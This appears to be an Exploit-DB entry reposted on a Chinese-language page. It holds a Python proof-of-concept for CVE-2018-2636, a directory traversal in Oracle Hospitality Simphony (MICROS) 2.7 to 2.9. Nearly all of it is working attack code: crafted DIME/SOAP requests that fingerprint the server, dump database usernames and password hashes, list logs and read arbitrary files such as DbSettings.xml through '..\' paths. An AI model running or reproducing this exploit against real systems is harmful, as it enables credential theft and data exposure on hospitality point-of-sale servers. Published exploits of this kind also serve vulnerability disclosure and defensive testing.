Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal

  • 作者: Dmitry Chastuhin
    日期: 2018-02-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/43960/
  • # Exploit Title: Oracle Hospitality Simphony (MICROS) directory traversal 
    # Date: 30.01.2018
    # Exploit Author: Dmitry Chastuhin (https://twitter.com/_chipik)
    # Vendor Homepage: http://www.oracle.com/
    # Version: 2.7, 2.8 and 2.9
    # Tested on: Win, nix
    # CVE : CVE-2018-2636
    
    
    #!/usr/bin/env python
    
    # https://twitter.com/_chipik
    # Sorry for bad code practises. This is just a PoC, don't blame us very hard ¯\_(ツ)_/¯
    import requests
    import argparse
    import unicodedata
    
    
    def rm_right(str):
    rez=""
    k=0
    for i in range(len(str)):
    rez = rez + str[k:k+2]
    k=k+4
    return rez
    
    
    def add_right(str,char):
    rez=""
    k=0
    for i in range(len(str)/2):
    rez= rez + str[k:k+2]+char
    k=k+2
    return rez
    
    
    def rm_left(str):
    rez=""
    k=2
    for i in range(len(str)):
    rez = rez + str[k:k+2]
    k=k+4
    return rez
    
    
    def add_left(str,char):
    rez=""
    k=0
    for i in range(len(str)/2):
    rez= rez + char + str[k:k+2]
    k=k+2
    return rez
    
    
    def send(data,dos=0):
    if args.verb:
    print "[DBG] \n"+data.encode("hex")
    if dos:
    try:
    r = requests.post(base_uri, headers=headers, data=data, timeout=0.001)
    except:
    return
    else:
    r = requests.post(base_uri, headers=headers, data=data)
    if r.status_code == 200:
    if args.verb:
    print "[DBG] HEX:"
    print unicodedata.normalize('NFKD', r.text).encode('ascii','ignore').encode("hex")
    print "\n[DBG] RAW:\n"+r.text
    print ""
    return unicodedata.normalize('NFKD', r.text).encode('ascii','ignore')
    else:
    print "[DBG] status code: %d" % r.status_code
    print "[DBG] text : %s" % repr(r.text)
    
    
    def calculate_len(filename):
    len2 = (len(filename)+8)/2
    len1 = len2 + 8
    len0 = len1 + 124
    if args.verb:
    print "len2="+str('{0:02x}'.format(len2))
    print "len1="+str('{0:02x}'.format(len1))
    print "len0="+str('{0:04x}'.format(len0))
    return str('{0:04x}'.format(len0)),str('{0:02x}'.format(len1)),str('{0:02x}'.format(len2))
    
    
    def cli_info():
    print "[*] Let's get info about server"
    poc_pref='\x0c\x20\x00\x00\x00\x10\x00\x29\x00\x00\x01\x38\x55\x56\x51\x50\x70\x39\x78\x7a\x66\x69\x70\x56\x53\x6e\x4c\x75\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x78\x6d\x6c\x73\x6f\x61\x70\x2e\x6f\x72\x67\x2f\x73\x6f\x61\x70\x2f\x65\x6e\x76\x65\x6c\x6f\x70\x65\x2f\x00\x00\x00'
    poc_body='<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><soap:Body><ProcessDimeRequest xmlns=\"http://micros-hosting.com/EGateway/\" /></soap:Body></soap:Envelope>'
    poc_suf1='\x0a\x10\x00\x00\x00\x10\x00\x18\x00\x00\x00\x84\x55\x56\x51\x50\x70\x39\x78\x7a\x66\x69\x70\x56\x53\x6e\x4c\x75\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x01\xe1\x1e\x02\x00\x00\x00\x36\x00\x00\x00\x3c\x00\x53\x00\x49\x00\x2d\x00\x53\x00\x65\x00\x63\x00\x75\x00\x72\x00\x69\x00\x74\x00\x79\x00\x20\x00\x56\x00\x65\x00\x72\x00\x73\x00\x69\x00\x6f\x00\x6e\x00\x3d\x00\x22\x00\x32\x00\x22\x00\x20\x00\x2f\x00\x3e\x00\x58\x52\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc1\x1c\x01\x00\x00\x00\x01\xd1\x1d\xb8\x58\x00\x00\xb1\x36\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1d\xd1\x02\x1c\xc1\x02\x1e\xe1\x02'
    poc = poc_pref+poc_body+poc_suf1
    full_rez = send(poc)
    return full_rez
    
    
    def cli_dbinfo():
    print "[*] Let's get DB creds"
    poc_pref='\x0c\x20\x00\x00\x00\x10\x00\x29\x00\x00\x01\x38\x55\x56\x51\x50\x70\x39\x78\x7a\x66\x69\x70\x56\x53\x6e\x4c\x75\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x78\x6d\x6c\x73\x6f\x61\x70\x2e\x6f\x72\x67\x2f\x73\x6f\x61\x70\x2f\x65\x6e\x76\x65\x6c\x6f\x70\x65\x2f\x00\x00\x00'
    poc_body='<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><soap:Body><ProcessDimeRequest xmlns=\"http://micros-hosting.com/EGateway/\" /></soap:Body></soap:Envelope>'
    poc_suf1='\x0a\x10\x00\x00\x00\x10\x00\x18\x00\x00\x00\xa0\x73\x71\x33\x49\x71\x35\x50\x54\x74\x66\x32\x6b\x42\x73\x53\x48\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x01\xe1\x1e\x02\x00\x00\x00\x36\x00\x00\x00\x3c\x00\x53\x00\x49\x00\x2d\x00\x53\x00\x65\x00\x63\x00\x75\x00\x72\x00\x69\x00\x74\x00\x79\x00\x20\x00\x56\x00\x65\x00\x72\x00\x73\x00\x69\x00\x6f\x00\x6e\x00\x3d\x00\x22\x00\x32\x00\x22\x00\x20\x00\x2f\x00\x3e\x00\xbd\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc1\x1c\x01\x00\x00\x00\x01\xd1\x1d\x88\x96\x00\x00\x35\x53\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\x24\x00\x00\x00\x0d\x00\x44\x62\x49\x6e\x66\x6f\x52\x65\x71\x75\x65\x73\x74\x01\x00\x00\x00\x01\x00\x06\x00\x6d\x53\x70\x61\x72\x65\x08\x00\x00\x00\x00\x00\x00\x1d\xd1\x02\x1c\xc1\x02\x1e\xe1\x02'
    poc = poc_pref+poc_body+poc_suf1
    full_rez = send(poc)
    return full_rez
    
    
    def cli_log_list():
    print "[*] Let's get log list"
    poc = "0c200000001000290000013872663850506e79467478667275366577687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f0000003c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d227574662d38223f3e3c736f61703a456e76656c6f706520786d6c6e733a736f61703d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f2220786d6c6e733a7873693d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612d696e7374616e63652220786d6c6e733a7873643d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d61223e3c736f61703a426f64793e3c50726f6365737344696d655265717565737420786d6c6e733d22687474703a2f2f6d6963726f732d686f7374696e672e636f6d2f45476174657761792f22202f3e3c2f736f61703a426f64793e3c2f736f61703a456e76656c6f70653e0a100000001000180000008e72663850506e794674786672753665776170706c69636174696f6e2f6f637465742d73747265616d01e11e02000000360000003c00530049002d00530065006300750072006900740079002000560065007200730069006f006e003d0022003200220020002f003e00a5980000000000000000000001c11c0100000001d11d98a20000b13600000100000000000000000000001e00000012000000050000000a000000240024006c006f0067001dd1021cc1021ee1020000"
    full_rez = send(poc.decode("hex"))
    return full_rez
    
    
    def cli_read_log(filename):
    log2="log\\"+filename
    print "[*] Let's read %s" % log2
    log = add_left(log2.encode("hex"),"00")
    poc_pref='\x0c\x20\x00\x00\x00\x10\x00\x29\x00\x00\x01\x38\x55\x56\x51\x50\x70\x39\x78\x7a\x66\x69\x70\x56\x53\x6e\x4c\x75\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x78\x6d\x6c\x73\x6f\x61\x70\x2e\x6f\x72\x67\x2f\x73\x6f\x61\x70\x2f\x65\x6e\x76\x65\x6c\x6f\x70\x65\x2f\x00\x00\x00'
    poc_body='<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><soap:Body><ProcessDimeRequest xmlns=\"http://micros-hosting.com/EGateway/\" /></soap:Body></soap:Envelope>'
    poc_suf_1_1='0A100000001000180000'
    poc_suf_1_ses='66497a3263516c56444c35305045356e'
    poc_suf_1_2='6170706C69636174696F6E2F6F637465742D73747265616D01E11E02000000360000003C00530049002D00530065006300750072006900740079002000560065007200730069006F006E003D0022003200220020002F003E00C2AF0000000000000000000001C11C0100000001D11D8EBA0000B13600000100000000000000000000001E000000'
    poc_suf_1_len0, poc_suf_1_len1, poc_suf_1_len2 = calculate_len(log)
    poc_suf_1_3='00000006000000'
    poc_suf_1_4='000000240024'
    poc_suf1=(poc_suf_1_1+poc_suf_1_len0+poc_suf_1_ses+poc_suf_1_2+poc_suf_1_len1+poc_suf_1_3+poc_suf_1_len2+poc_suf_1_4).decode("hex")
    poc_logname = log.decode("hex")
    if len(log2) % 2 == 1:
    poc_suf2='001dd1021cc1021ee1020000'.decode("hex")
    else:
    poc_suf2='001dd1021cc1021ee102'.decode("hex")
    poc = poc_pref+poc_body+poc_suf1+poc_logname+poc_suf2
    full_rez = send(poc)
    return full_rez
    
    
    def cal_tst():
    file = "ServiceHostPrereq2012Sql\BootToDesktop.reg"
    suf = file.encode('utf-16le')
    print suf
    pre = "\x0c \x00\x00\x00)\x00)\x00\x00\x04muuid:4382e7a6-607d-4392-b5df-d4b8bfcf4185\x00\x00\x00http://schemas.xmlsoap.org/soap/envelope/\x00\x00\x00"
    xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:wsa=\"http://schemas.xmlsoap.org/ws/2004/03/addressing\" xmlns:wsse=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd\" xmlns:wsu=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd\"><soap:Header><wsa:Action>http://micros-hosting.com/EGateway/ProcessDimeRequest</wsa:Action><wsa:MessageID>uuid:12e52d09-38dc-4071-810d-7ced9a3bfd59</wsa:MessageID><wsa:ReplyTo><wsa:Address>http://schemas.xmlsoap.org/ws/2004/03/addressing/role/anonymous</wsa:Address></wsa:ReplyTo><wsa:To>http://172.16.2.207:8080/EGateway/EGateway.asmx</wsa:To><wsse:Security><wsu:Timestamp wsu:Id=\"Timestamp-dd366974-3fbb-4e40-b868-ef9303548245\"><wsu:Created>2017-07-11T22:18:58Z</wsu:Created><wsu:Expires>2017-07-11T22:19:28Z</wsu:Expires></wsu:Timestamp></wsse:Security></soap:Header><soap:Body><ProcessDimeRequest xmlns=\"http://micros-hosting.com/EGateway/\" /></soap:Body></soap:Envelope>"
    suf_1 = "\x00\x00\x00\x0a\x10\x00\x00\x00)\x00\x18\x00\x00\x00\xf3uuid:d9706c6f-d103-45b2-9ca2-ec588dab1c7d\x00\x00\x00application/octet-stream\x01\xe1\x1e\x02\x00\x00\x00\x00\x00\x00\x00N\x1c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc1\x1c\x01\x00\x00\x00\x01\xd1\x1dM\x1c\x01\x00kB\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1e\x00\x00\x00\xad\x00\x00\x00\x01\x00\x00\x002\x00\x00\x00kB\x00\x00\x00\x00\x00\x00\x03\x01\x04\x8a\x15\x00\x00\x00\x11\x00\x00\x00\x18\x00\x00\x00W\x00o\x00r\x00k\x00s\x00t\x00a\x00t\x00i\x00o\x00n\x001\x00\\\x00\x00\x00"
    suf_2 = "\x01\xadf\xd7\x00\x00\x00\x00\x00\x17t\x00\x00\x8e\x00\x00\x00\x00\x00\x00\x00\x1d\xd1\x02\x1c\xc1\x02\x1e\xe1\x02\x00"
    rez_S = suf_1+suf+suf_2
    data =pre+xml+rez_S
    
    print suf.decode('utf-16le')
    
    
    
    if __name__ == '__main__':
    parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument('-H', '--host', default='127.0.0.1', help='host')
    parser.add_argument('-P', '--port', default='8080', help='port')
    parser.add_argument('-i', '--info', action='store_true', help='information about micros installation')
    parser.add_argument('-d', '--dbinfo' ,action='store_true',help='information about micros db (usernames and hashes)')
    parser.add_argument('-l', '--log', action='store_true', help='information about log files')
    parser.add_argument('-s', '--ssl', action='store_true', help='enable SSL')
    parser.add_argument('-r', '--read', help='read file from server (root dir is c:\\. Ex.: windows\\win.ini) Also u can use 1 - for SimphonyInstall.xml and 2 - for DbSettings.xml' )
    parser.add_argument('-v', '--verb', action='store_true', default=0, help='verb')
    args = parser.parse_args()
    headers = dict()
    if args.ssl:
    base_uri = 'https://%s:%s%s' % (args.host, args.port, '/EGateway/EGateway.asmx')
    else:
    base_uri = 'http://%s:%s%s' % (args.host, args.port, '/EGateway/EGateway.asmx')
    
    headers['SOAPAction'] = '\"http://micros-hosting.com/EGateway/ProcessDimeRequest\"'
    headers['Content-Type']= 'application/dime'
    headers['Expect'] = '100-continue'
    
    if args.info:
    results = cli_info()
    if results.find('\x00\x55\x00\x6e\x00\x61\x00\x75\x00\x74\x00\x68\x00\x6f\x00\x72\x00\x69\x00\x7a\x00\x65\x00\x64') != -1:
    print "[*] Your instance is not vulnerable to CVE-2018-2636"
    else:
    print "[!] Your instance is vulnerable to CVE-2018-2636"
    print results
    exit()
    if args.dbinfo:
    print cli_dbinfo()
    exit()
    if args.log:
    print cli_log_list()
    exit()
    if args.read:
    if args.read == "1":
    print cli_read_log("..\\..\\..\\SimphonyInstall.xml")
    exit()
    if args.read == "2":
    print cli_read_log("..\\DbSettings.xml")
    exit()
    else:
    print cli_read_log(args.read)
    exit()